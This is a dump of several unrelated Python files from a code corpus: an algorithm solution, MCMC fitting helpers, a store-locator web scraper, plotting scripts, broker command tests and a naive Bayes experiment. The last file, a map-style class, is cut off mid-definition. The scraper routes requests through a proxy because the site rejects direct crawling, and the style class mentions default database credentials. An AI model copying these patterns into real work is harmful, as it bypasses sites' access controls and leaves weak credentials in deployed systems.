index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,900 | 6a45e98c33aa499319a06e5d4a6af2aad2e9f5d4 | """
476. Number Complement
Difficulty: Easy
Related Topics: Bit Manipulation, XOR
Given a positive integer, output its complement number. The complement strategy is to flip the bits of its binary representation.
Note:
The given integer is guaranteed to fit within the range of a 32-bit signed integer.
You could assume no leading zero bit in the integer’s binary representation.
Example 1:
Input: 5
Output: 2
Explanation: The binary representation of 5 is 101 (no leading zero bits), and its complement is 010. So you need to output 2.
Example 2:
Input: 1
Output: 0
Explanation: The binary representation of 1 is 1 (no leading zero bits), and its complement is 0. So you need to output 0.
"""
class Solution(object):
    def findComplement(self, num):
        """Flip every significant bit of a positive 32-bit integer.

        Builds a mask of 1-bits as wide as ``num``'s binary representation
        (``int.bit_length`` replaces the original string-formatting trick)
        and XORs it in, e.g. 5 (0b101) -> 2 (0b010).

        :type num: int  (guaranteed positive by the problem statement)
        :rtype: int
        """
        # max(..., 1) keeps the historical result for num == 0 (-> 1),
        # since bit_length(0) == 0 would otherwise yield an empty mask.
        width = max(num.bit_length(), 1)
        mask = (1 << width) - 1
        return num ^ mask
# Quick manual check of the solution above: 5 (0b101) -> 2 (0b010).
sample = 5
result = Solution().findComplement(sample)
print(result)
|
15,901 | 9fb7eda46e731951d9bd7d59b886815ec599e539 | import numpy as np
import emcee
import scipy.optimize as op
import matplotlib.pyplot as plt
import corner
import os
import scipy.stats as sstats
# local imports
import beer
def lnlike(theta, model, x, y, yerr):
    """Gaussian log-likelihood of the data under ``model``.

    Parameters
    ----------
    theta : sequence
        Model parameters, unpacked into ``model(x, *theta)``.
    model : callable
        ``model(x, *theta)`` must return predictions shaped like ``y``.
    x, y, yerr : array-like
        Independent variable, observations, and 1-sigma uncertainties.

    Returns
    -------
    float
        Log-likelihood; NaN terms in the data-dependent sums are ignored
        via ``nansum``, matching the original behaviour.
    """
    # Normalisation term is a constant: -(n/2) * log(2*pi).  The original
    # built a throwaway list of n identical values just to log/sum it.
    norm = -0.5 * len(y) * np.log(2.0 * np.pi)
    return norm \
        - np.nansum(np.log(yerr)) \
        - 0.5 * np.nansum(((y - model(x, *theta)) / yerr) ** 2)
def lnprior(theta, priors):
    """Flat (uniform) log-prior over a box.

    Parameters
    ----------
    theta : sequence of float
        Parameter vector to test.
    priors : sequence of (low, high) pairs
        Exclusive bounds, one pair per parameter.

    Returns
    -------
    float
        ``0.0`` when every parameter lies strictly within its bounds,
        ``-np.inf`` otherwise (rejecting the sample).
    """
    # Replaces the original manual pass-counter loop with the idiomatic
    # all()-over-zip form; an empty theta still passes (returns 0.0).
    inside = all(lo < value < hi for value, (lo, hi) in zip(theta, priors))
    return 0.0 if inside else -np.inf
def lnprob(theta, model, priors, x, y, yerr):
    """Log-posterior: flat prior plus Gaussian log-likelihood.

    Returns ``-inf`` immediately when ``theta`` falls outside the prior
    bounds, so the (possibly expensive) likelihood is only evaluated for
    walkers inside the allowed region.
    """
    prior_term = lnprior(theta, priors)
    if np.isfinite(prior_term):
        return prior_term + lnlike(theta, model, x, y, yerr)
    return -np.inf
def get_theta(guess_list, *args):
    """Maximum-likelihood parameter estimate.

    guess_list: initial parameter guesses handed to the optimiser
    args: extra arguments forwarded to lnlike() (model, x, y, yerr)
    """
    # Minimising the negative log-likelihood == maximising the likelihood.
    def negative_log_likelihood(*nll_args):
        return -lnlike(*nll_args)

    fit = op.minimize(negative_log_likelihood, guess_list, args=args)
    return fit["x"]
def get_samples(ID, params, pos, ndim, nwalkers, nsteps, theta, \
        model, priors, x, y, yerr, convergenceplot_name=None, cornerplot_name=None):
    """Run the emcee ensemble sampler and return post-burn-in samples.

    Parameters
    ----------
    ID : str or int
        Target identifier; plots are written to ``./targets/<ID>/``.
    params : list of str
        One axis label per sampled dimension.
    pos : array-like, shape (nwalkers, ndim)
        Initial walker positions.
    ndim, nwalkers, nsteps : int
        Sampler geometry and chain length.
    theta : array-like
        Maximum-likelihood estimate.  Unused here, kept so existing call
        sites do not break.
    model, priors, x, y, yerr
        Forwarded unchanged to ``lnprob``.
    convergenceplot_name, cornerplot_name : str or None
        Output file names for the diagnostic plots; ``None`` skips each.

    Returns
    -------
    numpy.ndarray
        Samples from the second half of every chain (first half discarded
        as burn-in), flattened to shape (-1, ndim).
    """
    sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, \
        args=(model, priors, x, y, yerr))
    sampler.run_mcmc(pos, nsteps)
    # Optional burn-in diagnostic: one walker-trace panel per dimension.
    if convergenceplot_name is not None:  # fixed: was non-idiomatic "!= None"
        if ndim == 1:
            fig = plt.figure()
            plt.plot(sampler.chain[:, :, 0].T, color='black', alpha=0.1)
            plt.ylabel(params[0])
            plt.xlabel('steps')
        else:
            fig, axs = plt.subplots(ndim, 1, sharex=True)
            for i in range(ndim):
                axs[i].plot(sampler.chain[:, :, i].T, color='black', alpha=0.1)
                axs[i].set_ylabel(params[i])
            axs[ndim - 1].set_xlabel('steps')
        fig.set_size_inches(10, 10)
        plt.savefig(os.getcwd() + '/targets/' + str(ID) + '/' + convergenceplot_name)
    # Discard the first half of each chain as burn-in and flatten.
    samples = sampler.chain[:, int(nsteps / 2):, :].reshape((-1, ndim))
    # Optional corner (pairwise posterior) plot with the median and the
    # central-68% quantiles shown in the panel titles.
    if cornerplot_name is not None:  # fixed: was "!= None"; helper inlined
        fig = corner.corner(samples, labels=params, quantiles=[0.16, 0.5, 0.84], \
            show_titles=True, title_kwargs={"fontsize": 12})
        plt.savefig(os.getcwd() + '/targets/' + str(ID) + '/' + cornerplot_name)
    return samples
|
15,902 | 8237b4491eea11cc2c05647f0115f609d6ecdeb4 | import json
import re
import scrapy
from scrapy.http import JsonRequest
from locations.dict_parser import DictParser
from locations.hours import OpeningHours, day_range
from locations.spiders.vapestore_gb import clean_address
class FoodLionUSSpider(scrapy.Spider):
    """Spider for Food Lion (US grocery chain) store locations.

    Queries the store-locator JSON endpoint once per state and parses
    each returned store record into a location item.
    """
    name = "foodlion_us"
    item_attributes = {"brand": "Food Lion", "brand_wikidata": "Q1435950"}
    allowed_domains = ["www.foodlion.com"]
    start_urls = ["https://www.foodlion.com/stores/"]
    # Endpoint rejects direct crawling; route requests through a proxy.
    requires_proxy = True

    def start_requests(self):
        """Issue one store-locator query per state Food Lion operates in."""
        for state in ["GA", "SC", "NC", "MD", "TN", "VA"]:
            yield JsonRequest(url=f"https://www.foodlion.com/bin/foodlion/search/storelocator.json?state={state}")

    @staticmethod
    def parse_hours(hours: list[str]) -> OpeningHours:
        """Parse strings like "Mon-Fri: 7:00am - 10:00pm" into OpeningHours.

        Returns the literal string "24/7" for always-open stores —
        presumably an accepted opening_hours sentinel downstream; confirm
        against the pipeline before changing.
        """
        oh = OpeningHours()
        for rule in hours:
            if rule == "Open 24 Hours":
                return "24/7"
            # Dots are stripped first so "a.m."/"p.m." variants also match.
            if m := re.match(
                r"(\w+)(?:-(\w+))?: (\d+:\d\d)\s*([ap]m)\s*-\s*(\d+:\d\d)\s*([ap]m)", rule.replace(".", "")
            ):
                start_day, end_day, start_time, start_zone, end_time, end_zone = m.groups()
                if not end_day:
                    # Single-day rule such as "Sun: ..." — a range of one day.
                    end_day = start_day
                oh.add_days_range(
                    day_range(start_day, end_day),
                    f"{start_time} {start_zone}",
                    f"{end_time} {end_zone}",
                    time_format="%I:%M %p",
                )
        return oh

    def parse(self, response, **kwargs):
        """Yield one item per store.

        The payload's "result" field is itself a JSON-encoded string,
        hence the nested json.loads on top of response.json().
        """
        for store in json.loads(response.json()["result"]):
            store["street_address"] = clean_address(store.pop("address"))
            item = DictParser.parse(store)
            item["website"] = f'https://www.foodlion.com{ store["href"]}'
            item["opening_hours"] = self.parse_hours(store["hours"])
            yield item
|
15,903 | 721f0fdf53d7bdf7fafefe343ee456598cd0e78c | from pylab import *
import seaborn as sns
import json
# load data
migrationEffect1 = {}
migrationEffect2 = {}
# f = open("migrationEffect","r")
# migrationEffect1 = json.loads(f.read())
# f.close()
f = open("migrationEffect4","r")
migrationEffect2 = json.loads(f.read())
f.close()
# show data
# sns.set_palette("Paired",2)
figure(1)
title(u"small file do not know whether migration")
# colors = sns.color_palette('Paired',2)
colors = ["yellow","blue"]
keys = ["beforeMigration","afterMigration"]
for key in keys:
data = migrationEffect2[key]
beginTime = data["bt"]
timeSequence = data["ts"]
print len(timeSequence)
figx = []
figy = []
foret = beginTime
for i in xrange(len(timeSequence)):
v = timeSequence[i] - foret
figx.append(i+len(timeSequence)*keys.index(key))
figy.append(v)
foret = timeSequence[i]
# if key == "beforeMigration":
# bar(figx,figy,1,color=colors[keys.index(key)],label=key)
# else:
plot(figx,figy,color=colors[keys.index(key)],label=key)
# draw x y axis
# ticks_pos_x = []
# for i in xrange(10):
# ticks_pos_x.append(i*100)
# xticks(ticks_pos_x,ticks_pos_x)
xlabel("times")
# ticks_y = range(10)
# ticks_pos_y = range(10)
# yticks(ticks_pos_y,ticks_y)
ylabel("latency")
legend(loc='upper right')
# figure(2)
# title(u"3vs3, 4 process, Without data security")
# t = [u" Initial write ",u" Rewrite ",u" Read ",u" Re-read ",u" Random read ",u" Random write ",]
# for x in xrange(len(t)):
# k = t[x]
# figx = []
# figy = []
# for i in xrange(len(blockSize)):
# v = results[blockSize[i]][k]
# figx.append(i*8)
# if v != None:
# figy.append(v)
# else:
# figy.append(0)
# plot(figx,figy,label=t[x])
# # draw x y axis
# ticks_pos_x = []
# for i in range(len(blockSize)):
# ticks_pos_x.append(i*8)
# xticks(ticks_pos_x,blockSize)
# xlabel("Block Size")
# # ticks_y = ["100M","200M","300M","400M","500M","600M","700M","800M","900M","1G"]
# ticks_y = ["1GB","2GB","3GB"]
# gb =1048576 #KB
# ticks_pos_y = [1*gb,2*gb,3*gb]
# yticks(ticks_pos_y,ticks_y)
# ylabel("Throughput")
# legend(loc='upper left')
show()
|
15,904 | 149f44bae19ba03471c2fbacc392ae1434637b5a | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2015-2016,2018 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the search service command."""
import unittest
if __name__ == "__main__":
    # When executed directly (not via the suite driver), fix up sys.path
    # through the shared test helpers before importing the framework.
    import utils
    utils.import_depends()
from brokertest import TestBrokerCommand
class TestSearchService(TestBrokerCommand):
    """Tests for the broker's ``search_service`` command.

    Each test issues one command-line invocation and verifies which
    service/instance pairs appear (``matchoutput``) or are absent
    (``matchclean``) in the output.
    """

    def test_100_search_by_server(self):
        """Filtering by server host lists only the services it serves."""
        command = ["search_service", "--server_hostname", "unittest00.one-nyp.ms.com"]
        out = self.commandtest(command)
        self.matchoutput(out, "utsvc/utsi2", command)
        self.matchclean(out, "utsvc/utsi1", command)
        self.matchclean(out, "afs", command)

    def test_110_search_by_client(self):
        """Filtering by client host lists the services bound to it."""
        command = ["search_service", "--client_hostname", "unittest00.one-nyp.ms.com"]
        out = self.commandtest(command)
        self.matchoutput(out, "afs/q.ny.ms.com", command)
        self.matchoutput(out, "bootserver/unittest", command)
        self.matchoutput(out, "dns/unittest", command)
        self.matchoutput(out, "ntp/pa.ny.na", command)
        self.matchoutput(out, "support-group/ec-service", command)
        self.matchclean(out, "bootserver/one-nyp", command)
        self.matchclean(out, "dns/one-nyp", command)

    def test_120_has_clients(self):
        """--has_clients lists every instance with at least one client."""
        command = ["search_service", "--has_clients"]
        out = self.commandtest(command)
        self.matchoutput(out, "afs/afs-by-net", command)
        self.matchoutput(out, "afs/q.ny.ms.com", command)
        self.matchoutput(out, "aqd/ny-prod", command)
        self.matchoutput(out, "bootserver/one-nyp", command)
        self.matchoutput(out, "bootserver/unittest", command)
        self.matchoutput(out, "dns/one-nyp", command)
        self.matchoutput(out, "dns/unittest", command)
        self.matchoutput(out, "esx_management_server/ut.a", command)
        self.matchoutput(out, "esx_management_server/ut.b", command)
        self.matchoutput(out, "ntp/pa.ny.na", command)
        self.matchoutput(out, "scope_test/target-personality", command)
        self.matchoutput(out, "support-group/ec-service", command)
        self.matchoutput(out, "syslogng/ny-prod", command)
        self.matchoutput(out, "utsvc/utsi1", command)
        self.matchoutput(out, "utsvc/utsi2", command)
        self.matchoutput(out, "vmseasoning/pepper", command)
        self.matchoutput(out, "vmseasoning/salt", command)
        self.matchclean(out, "afs/q.ln.ms.com", command)
        self.matchclean(out, "scope_test/scope-building", command)
        self.matchclean(out, "poll_helper/unittest", command)
        self.matchclean(out, "unmapped/instance1", command)
        self.matchclean(out, "utnotify/localhost", command)
        self.matchclean(out, "vcenter/ut", command)

    def test_130_no_clients(self):
        """--no_clients is the complement of --has_clients."""
        command = ["search_service", "--no_clients"]
        out = self.commandtest(command)
        self.matchoutput(out, "afs/q.ln.ms.com", command)
        self.matchoutput(out, "camelcase/camelcase", command)
        self.matchoutput(out, "scope_test/scope-building", command)
        self.matchoutput(out, "poll_helper/unittest", command)
        self.matchoutput(out, "unmapped/instance1", command)
        self.matchoutput(out, "utnotify/localhost", command)
        self.matchoutput(out, "vcenter/ut", command)
        self.matchclean(out, "afs/ny-prod", command)
        self.matchclean(out, "bootserver/one-nyp", command)
        self.matchclean(out, "bootserver/unittest", command)

    def test_140_server_location(self):
        """Server-location search includes sub-locations of the building."""
        command = ["search_service", "--server_building", "ut"]
        out = self.commandtest(command)
        self.matchoutput(out, "bootserver/unittest", command)
        self.matchoutput(out, "chooser1/ut.a", command)
        self.matchoutput(out, "chooser1/ut.b", command)
        self.matchoutput(out, "chooser1/ut.c", command)
        self.matchoutput(out, "chooser2/ut.a", command)
        self.matchoutput(out, "chooser2/ut.c", command)
        self.matchoutput(out, "chooser3/ut.a", command)
        self.matchoutput(out, "chooser3/ut.b", command)
        self.matchoutput(out, "dns/unittest", command)
        self.matchoutput(out, "utnotify/localhost", command)
        self.matchoutput(out, "utsvc/utsi1", command)
        self.matchoutput(out, "utsvc/utsi2", command)
        self.matchclean(out, "bootserver/one-nyp", command)
        self.matchclean(out, "dns/one-nyp", command)
        self.matchoutput(out, "test_network_dev/test", command)

    def test_141_server_location_exact_location(self):
        """With --server_exact_location, sub-location servers are excluded."""
        command = ["search_service",
                   "--server_building", "ut",
                   "--server_exact_location"]
        out = self.commandtest(command)
        self.matchclean(out, "bootserver/unittest", command)
        self.matchclean(out, "chooser1/ut.a", command)
        self.matchclean(out, "chooser1/ut.b", command)
        self.matchclean(out, "chooser1/ut.c", command)
        self.matchclean(out, "chooser2/ut.a", command)
        self.matchclean(out, "chooser2/ut.c", command)
        self.matchclean(out, "chooser3/ut.a", command)
        self.matchclean(out, "chooser3/ut.b", command)
        self.matchclean(out, "dns/unittest", command)
        self.matchclean(out, "utnotify/localhost", command)
        self.matchclean(out, "utsvc/utsi1", command)
        self.matchclean(out, "utsvc/utsi2", command)
        self.matchclean(out, "bootserver/one-nyp", command)
        self.matchclean(out, "dns/one-nyp", command)
        self.matchoutput(out, "test_network_dev/test", command)

    def test_150_client_location(self):
        """Client-location search includes sub-locations of the building."""
        command = ["search_service", "--client_building", "np"]
        out = self.commandtest(command)
        self.matchoutput(out, "afs/q.ny.ms.com", command)
        self.matchoutput(out, "aqd/ny-prod", command)
        self.matchoutput(out, "bootserver/one-nyp", command)
        self.matchoutput(out, "dns/one-nyp", command)
        self.matchoutput(out, "ntp/pa.ny.na", command)
        self.matchoutput(out, "support-group/ec-service", command)
        self.matchoutput(out, "syslogng/ny-prod", command)
        self.matchoutput(out, "utsvc/utsi1", command)
        self.matchclean(out, "bootserver/unittest", command)
        self.matchclean(out, "dns/unittest", command)
        self.matchclean(out, "utsvc/utsi2", command)
        self.matchclean(out, "vmseasoning", command)
        self.matchclean(out, "esx_management_server", command)

    def test_151_client_location_exact_location(self):
        """With --client_exact_location, sub-location clients are excluded."""
        command = ["search_service",
                   "--client_building", "np",
                   "--client_exact_location"]
        out = self.commandtest(command)
        self.matchclean(out, "afs/q.ny.ms.com", command)
        self.matchclean(out, "aqd/ny-prod", command)
        self.matchclean(out, "bootserver/one-nyp", command)
        self.matchclean(out, "dns/one-nyp", command)
        self.matchclean(out, "ntp/pa.ny.na", command)
        self.matchclean(out, "support-group/ec-service", command)
        self.matchclean(out, "syslogng/ny-prod", command)
        self.matchclean(out, "utsvc/utsi1", command)
if __name__ == '__main__':
    # Run this module's tests directly with a verbose, per-test report.
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(loader.loadTestsFromTestCase(TestSearchService))
|
15,905 | b38634efc4da8049953a8110b954afd3516f67ef | #bernouli multinomial ou gaussiana
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import cross_val_score
from sklearn.metrics import roc_curve, auc
from sklearn.naive_bayes import GaussianNB, MultinomialNB, ComplementNB, BernoulliNB
from imblearn.over_sampling import ADASYN, RandomOverSampler, SMOTE
from sklearn.model_selection import KFold
import sys
from funcs_aps import k_fold_eval
# Print arrays in full when debugging.  FIX: np.nan is rejected as a
# threshold by modern NumPy ("threshold must be non-NAN"); sys.maxsize is
# the documented way to disable summarisation.
np.set_printoptions(threshold=sys.maxsize)
#df_train = pd.read_csv('prpr_data/df_train_mean.csv')
#df_test = pd.read_csv('prpr_data/df_test_mean.csv')
df_train = pd.read_csv('prpr_data/df_badrm_train.csv')
df_test = pd.read_csv('prpr_data/df_badrm_test.csv')
# df_train = df_train.drop(columns=['cd_000'])
# df_test = df_test.drop(columns=['cd_000'])
# col = [17, 63, 68, 83, 95]
# col = [elem+15 for elem in col]
# print(col)
# X_train_imb = df_train.iloc[:, col].values
# First column is the class label; remaining columns are the features.
X_train_imb = df_train.iloc[:, 1:].values
y_train_imb = df_train.iloc[:, 0].values
X_test = df_test.iloc[:, 1:].values
y_test = df_test.iloc[:, 0].values
# Oversample the minority class with SMOTE.
# NOTE(review): `ratio=` and `fit_sample` are the pre-0.4 imbalanced-learn
# API (newer releases use `sampling_strategy` / `fit_resample`) — confirm
# the pinned version before upgrading.
over_smote = SMOTE(random_state=57, ratio='auto')
X_train_bal, y_train_bal = over_smote.fit_sample(X_train_imb, y_train_imb)
# SMOTE appends the synthetic samples at the end, so reshuffle the rows.
p = np.random.permutation(len(y_train_bal))
X_train_bal = X_train_bal[p]
y_train_bal = y_train_bal[p]
# dont forget to scale data for naive bayes:
min_max_scaler = preprocessing.MinMaxScaler()
min_max_scaler.fit(X_train_bal)
X_train_bal = min_max_scaler.transform(X_train_bal)
#X_test = min_max_scaler.transform(X_test)
#sys.stdout = open('NBayes_cv.txt', 'a')
## NAIVE BAYES
#classf = GaussianNB()
classf = MultinomialNB()
#classf = ComplementNB()
# classf = BernoulliNB()
print("\n \n")
print(classf)
#classf.fit(X_train_bal, y_train_bal)
k_fold_eval(classf, X_train_bal, y_train_bal)
# # for test set
# print('\n \n test set \n')
# y_pred_test = classf.predict(X_test)
# y_true_test = y_test
#
#
# print("Accuracy on test set: " + str(accuracy_score(y_true_test, y_pred_test)))
#
# cm_test = confusion_matrix(y_true_test, y_pred_test)
# print("Confusion matrix Test set")
# print(cm_test)
#
# TPrate = cm_test[1,1]/(cm_test[1,1]+cm_test[1,0]) # TPrate= TP/(TP+FN)
# print("TPrate NB (test) = " + str(TPrate))
# specif = cm_test[0,0]/(cm_test[0,0]+cm_test[0,1]) # specificity = TN/(TN+FP)
# print("specificity NB (test) = " + str(specif))
# cost = cm_test[0,1]*10 + cm_test[1,0]*500
# print("cost (test) = " + str(cost))
#
# # Compute ROC curve and ROC area for each class
# y_score_test = classf.predict_proba(X_test)
# y_score_test = np.array(y_score_test)[:,1]
# fpr_nb_test, tpr_nb_test, _ = roc_curve(y_true_test, y_score_test)
# roc_auc_nb_test = auc(fpr_nb_test, tpr_nb_test)
# print("auc (test) = " + str(roc_auc_nb_test))
|
15,906 | 9f6bf5d8ca38ad4d83127931504ea37b63574055 |
import os
import sys
import glob
import json
import numpy
import pandas
import datetime
import subprocess
import matplotlib
from matplotlib import pyplot
import covid_utils as utils
def main():
    """Offer each demo plot in turn; build and return the first accepted one."""
    # USA summary
    if input('\nPlot data summary for USA? [y/N] ').lower() in ('y', 'yes'):
        return plot_usa_summary()
    # Massachusetts summary
    if input('Plot data summary for Massachusetts? [y/N] ').lower() in ('y', 'yes'):
        return plot_state_summary('ma')
    # Benford example 1: cumulative US case counts
    if input('Plot example 1 Benford analysis? [y/N] ').lower() in ('y', 'yes'):
        df_us = utils.load_df_us()
        return plot_benford_breakdown(df_us, column='positive', data_label='cumulative # cases', legend_title='Data for USA')
    # Benford example 2: daily Massachusetts deaths
    if input('Plot example 2 Benford analysis? [y/N] ').lower() in ('y', 'yes'):
        df_ma = utils.load_df_state('ma')
        return plot_benford_breakdown(df_ma, column='deathIncrease', data_label='# deaths per day', legend_title='Data for Massachusetts')
def plot_usa_summary(days_smooth=7):
    '''
    Generates a summary plot of positive cases and deaths for the USA.

    Parameters
    ----------
    days_smooth : int
        Width (in days) of the rolling mean applied to both series.

    Returns
    -------
    matplotlib.figure.Figure
    '''
    df = utils.load_df_us()
    fig, (ax1, ax2) = pyplot.subplots(ncols=2, figsize=(10.5, 5), sharex=True)
    fig.subplots_adjust(left=0.08, top=0.91, right=0.98, bottom=0.15, wspace=0.2)
    ax1.set_title('# New Cases per day in USA', size=16)
    ax2.set_title('# Deaths per day in USA', size=16)
    # Shift each point back by half the smoothing window so the trailing
    # rolling mean is plotted centered on its window.
    dt = pandas.Timedelta('%iD'%days_smooth)
    ax1.plot(df['date']-dt/2., df['positiveIncrease'].rolling(days_smooth).mean(), lw=3, color='#135cd1')
    ax2.plot(df['date']-dt/2., df['deathIncrease'].rolling(days_smooth).mean(), lw=3, color='#d40f0f')
    ax1.grid(lw=1, color='gray', ls=':')
    ax2.grid(lw=1, color='gray', ls=':')
    ### converting xlabel from date to month name
    # A draw is needed first: tick labels are only populated after rendering.
    fig.canvas.draw()
    x_dates = pandas.DatetimeIndex([x.get_text() for x in ax1.xaxis.get_ticklabels()])
    x_months = [month[0:3] for month in x_dates.month_name()]
    ax1.xaxis.set_ticklabels(x_months)
    ### formatting y-axis of new-cases plot
    # Abbreviate thousands: reverse, rewrite leading '000' as 'k', reverse
    # back (e.g. '60000' -> '60k').
    yticks = [ytick.get_text() for ytick in ax1.yaxis.get_ticklabels()]
    yticks_new = [ytick[::-1].replace('000','k')[::-1] for ytick in yticks]
    ax1.yaxis.set_ticklabels(yticks_new)
    ### references
    # NOTE(review): '\i' and '\;' are not recognised escapes so they stay
    # literal, but a raw string r'...' would be more robust.
    ref = '$\it Data \; from \; the \; COVID \; Tracking \; Project$\n%s' % utils.URL_API
    t = ax2.text(0.97, -0.09, ref, transform=ax2.transAxes, ha='right', va='top', size=10, color='#666666')
    return fig
def plot_state_summary(state, days_smooth=7, format_yaxis=True):
    '''
    Generates a summary plot of positive cases and deaths for the given state.

    Parameters
    ----------
    state : str
        Two-letter state code (e.g. 'ma'); used for data lookup and titles.
    days_smooth : int
        Width (in days) of the rolling mean applied to both series.
    format_yaxis : bool
        When True, abbreviate thousands on the new-cases y-axis ('60000' -> '60k').

    Returns
    -------
    matplotlib.figure.Figure
    '''
    df = utils.load_df_state(state)
    fig, (ax1, ax2) = pyplot.subplots(ncols=2, figsize=(10.5, 5), sharex=True)
    fig.subplots_adjust(left=0.08, top=0.91, right=0.98, bottom=0.15, wspace=0.2)
    ax1.set_title('# New Cases per day in %s' % state.upper(), size=16)
    ax2.set_title('# Deaths per day in %s' % state.upper(), size=16)
    # Shift points back by half the window to center the rolling mean.
    dt = pandas.Timedelta('%iD'%days_smooth)
    ax1.plot(df['date']-dt/2., df['positiveIncrease'].rolling(days_smooth).mean(), lw=3, color='#135cd1')
    ax2.plot(df['date']-dt/2., df['deathIncrease'].rolling(days_smooth).mean(), lw=3, color='#d40f0f')
    ax1.grid(lw=1, color='gray', ls=':')
    ax2.grid(lw=1, color='gray', ls=':')
    ### converting xlabel from date to month name
    # Tick labels only exist after a draw.
    fig.canvas.draw()
    x_dates = pandas.DatetimeIndex([x.get_text() for x in ax1.xaxis.get_ticklabels()])
    x_months = [month[0:3] for month in x_dates.month_name()]
    ax1.xaxis.set_ticklabels(x_months)
    ### formatting y-axis of new-cases plot
    if format_yaxis == True:
        yticks = [ytick.get_text() for ytick in ax1.yaxis.get_ticklabels()]
        yticks_new = [ytick[::-1].replace('000','k')[::-1] for ytick in yticks]
        ax1.yaxis.set_ticklabels(yticks_new)
    ### references
    ref = '$\it Data \; from \; the \; COVID \; Tracking \; Project$\n%s' % utils.URL_API
    t = ax2.text(0.97, -0.09, ref, transform=ax2.transAxes, ha='right', va='top', size=10, color='#666666')
    return fig
def plot_benford_breakdown(df_input, column='positiveIncrease', data_label='# new cases per day', legend_title=''):
    '''
    Description
    -----------
    Generates a plot showing the fraction of entries of `column`
    in `df_input` that begin with each leading digit of (1-9),
    compared against the distribution predicted by Benford's Law.

    Parameters
    ----------
    df_input : pandas.DataFrame
        Dataframe containing the data
    column : str
        Name of column to analyze
    data_label : str
        Legend label for the observed-frequency series
    legend_title : str
        Title displayed above the legend

    Returns
    -------
    matplotlib.figure.Figure

    Raises
    ------
    IOError
        If `column` is not present in `df_input`
    '''
    if column not in df_input.columns:
        raise IOError('Column "%s" not found in input dataframe' % column)
    ### ignoring values of 0 and NaN
    df_input = df_input.query('%s!=0' % column).dropna(subset=[column])
    ### extracting leading digits
    # First character of str(value); assumes non-negative values (a '-'
    # sign would fail int()) and integer-like magnitudes — TODO confirm.
    leading_digits = df_input[column].apply(lambda val: int(str(val)[0])).values
    ### counting frequencies
    counts = numpy.array([(leading_digits==i).sum() for i in range(1,10)])
    ### initializing figure
    fig, ax = pyplot.subplots()
    ax.set_xlabel('Leading Digit', size=14)
    ax.set_ylabel('Fraction of total', size=14)
    ax.grid(color='gray', lw=1, ls=':')
    # Observed fractions with sqrt(N) counting-statistics error bars.
    ax.errorbar(range(1,10), counts/counts.sum(), yerr=counts**0.5/counts.sum(), ls='-', marker='o', ms=9, color='g', mfc='none', mec='g', mew=2, ecolor='g', elinewidth=2, capsize=0, label=data_label)
    # Reference curve: expected Benford frequencies.
    ax.plot(range(1,10), utils.benford_probabilities(), ls='-', lw=3, dashes=[4,1], color='r', label="Benford's Law")
    legend = ax.legend(loc='upper right', title=legend_title, fontsize=11)
    pyplot.setp(legend.get_title(), fontsize=12)
    return fig
if __name__ == '__main__':
main()
|
15,907 | c4d798ae99a2e628dfdf43388854fdb874ec8b47 | import random
from .postgres import Pg
from .classifiedStyle import ClassifiedStyle
from .rasterStyle import RasterStyle
from matplotlib.colors import rgb2hex
from .support import str_to_num
class StyleSld (ClassifiedStyle, RasterStyle, Pg):
    """
    This is the main style class for generating the SLD files.
    There are mainly 4 types of styles based on the data
    1. SIMPLE : Valid for point, line, polygon features
    2. CATEGORIZED : Valid for point, line, polygon features
    3. CLASSIFIED : Valid for point, line, polygon features
    4. RASTER : Valid for raster dataset
    Simple Style:
    =============
    The simple style
    Parameters:
    -----------
    attribute_name : str
        Required: For CLASSIFIED and CATEGORIZED style / Not required for SIMPLE and RASTER style
        Default Value: None
        Description:
    values: array
        Required: For CLASSIFIED and CATEGORIZED style / Not required for SIMPLE and RASTER style
        Default Value: None
        Description:
    number_of_class : int
        Required: For CLASSIFIED style / Not required for SIMPLE, CATEGORIZED and RASTER style
        Default Value: 5
        Description: The number of classes for the CATEGORIZED style is equal to length of `values`
    color_palette : str, list, dict
        Required: For CATEGORIZED, CLASSIFIED AND RASTER style / Not required for SIMPLE style
        Default Value: 'Spectral_r'
        Description:
    style_name : str
        Required: Required
        Default Value: 'style'
        Description:
    geom_type : str
        Required: For CATEGORIZED, CLASSIFIED AND SIMPLE style / Not required for RASTER style
        Default Value: 'polygon'
        Available Values: 'point', 'line', 'polygon'
        Description:
    classification_method: str
        Required: For CLASSIFIED style / Not required for CATEGORIZED, RASTER AND SIMPLE style
        Default Value: 'natural_break'
        Available Values: 'natural_break', 'equal_interval', 'quantile', 'standard_deviation', 'geometrical_interval'
    fill_color: str, color_code
        Required: For SIMPLE style
        Default Value: '#ffffff'
    stroke_color: str, color_code
        Required: For SIMPLE, CATEGORIZED, AND CLASSIFIED style
        Default Value: '#333333'
    stroke_width: numeric
        Required: For SIMPLE, CATEGORIZED, AND CLASSIFIED style
        Default Value: 1
    opacity: numeric, value between 0 and 1
        Required: Required
        Default Value: 1
    dbname: str
        Required: Optional
        Default Value: None
    user: str
    password: str
    host: str
    schema: str
    pg_table_name: str
    point_size: int
    well_known_name: str
    point_rotation: int
    stroke_linecap: str
    stroke_dasharray: str
    perpendicular_offset: str
    feature_label: bool
    font_family: str
    font_color: str, color_code
    font_size: int
    font_weight: str
    font_style: str
    halo_color: str, color_code
    halo_radius: numeric
    continuous_legend: bool
    """

    def __init__(
        self,
        attribute_name=None,
        values=None,
        number_of_class=5,
        color_palette="Spectral_r",
        style_name='style',
        geom_type='polygon',
        classification_method='natural_break',
        fill_color='#ffffff',
        stroke_color="#333333",
        stroke_width=1,
        opacity=1,
        dbname=None,
        # NOTE(review): default credentials ('postgres'/'admin') are
        # development conveniences — do not rely on them in production.
